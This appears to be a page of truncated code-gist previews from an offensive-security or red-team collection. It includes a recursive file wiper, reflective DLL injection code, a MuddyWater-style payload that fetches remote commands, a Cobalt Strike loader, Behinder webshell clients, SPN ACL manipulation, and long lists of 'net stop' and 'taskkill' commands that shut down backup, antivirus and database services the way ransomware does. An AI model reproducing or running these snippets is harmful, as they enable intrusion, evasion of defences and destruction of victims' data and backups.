.\wipe <directory>
will rewrite all files in a directory recursively
# adapted from https://stackoverflow.com/a/6291111 | |
# | |
# TargetObject = account with SPN | |
# $TargeObject = "LDAP://CN=foo,CN=Users,DC=contoso,DC=local" | |
# Identity = identity to be put in ACE | |
# $Identity = [security.principal.ntaccount]"contoso\user" | |
# $Identity = [security.principal.securityidentified]"S-1-1-0" | |
# Deny = deny or allow access | |
Function Set-SpnPermission { | |
param( |
using System; | |
using System.IO; | |
using System.Linq; | |
using System.Security.Cryptography; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Threading.Tasks; | |
using Microsoft.Win32; | |
public class Crypto |
//modified from: https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection | |
#include <iostream> | |
#include <windows.h> | |
#include "resource.h" | |
typedef struct BASE_RELOCATION_BLOCK { | |
DWORD PageAddress; | |
DWORD BlockSize; | |
} BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK; |
Payload used by MuddyWater as detailed here: https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html | |
Replace "http://127.0.0.1:8000/cmd" with link to page containing command | |
Command page should be something like: "c:\windows\system32\cmd.exe /c calc.exe" |
# pip install JPype1 | |
import jpype | |
import jpype.imports | |
from jpype.types import * | |
import os | |
os.chdir("<cobaltstrike directory>") # required for auth file lookup | |
jpype.startJVM() | |
jpype.addClassPath("<cobaltstrike directory>/cobaltstrike.jar") |
@echo off | |
setlocal enabledelayedexpansion | |
set "true=1" | |
:loop | |
if defined true ( | |
set /p c="%cd%> " | |
start !c! | |
set c= |
net stop "Acronis VSS Provider" /y | |
net stop "Enterprise Client Service" /y | |
net stop "SQLsafe Backup Service" /y | |
net stop "SQLsafe Filter Service" /y | |
net stop "Veeam Backup Catalog Data Service" /y | |
net stop AcronisAgent /y | |
net stop AcrSch2Svc /y | |
net stop Antivirus /y | |
net stop ARSM /y | |
net stop BackupExecAgentAccelerator /y |
# Behinder Webshell Clients | |
## php_cmd.py | |
Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar. |
net1 stop samss /y | |
net1 stop veeamcatalogsvc /y | |
net1 stop veeamcloudsvc /y | |
net1 stop veeamdeploysvc /y | |
net.exe stop samss /y | |
net.exe stop veeamcatalogsvc /y | |
net.exe stop veeamcloudsvc /y | |
net.exe stop veeamdeploysvc /y | |
taskkill.exe /IM sqlbrowser.exe /F | |
taskkill.exe /IM sqlceip.exe /F |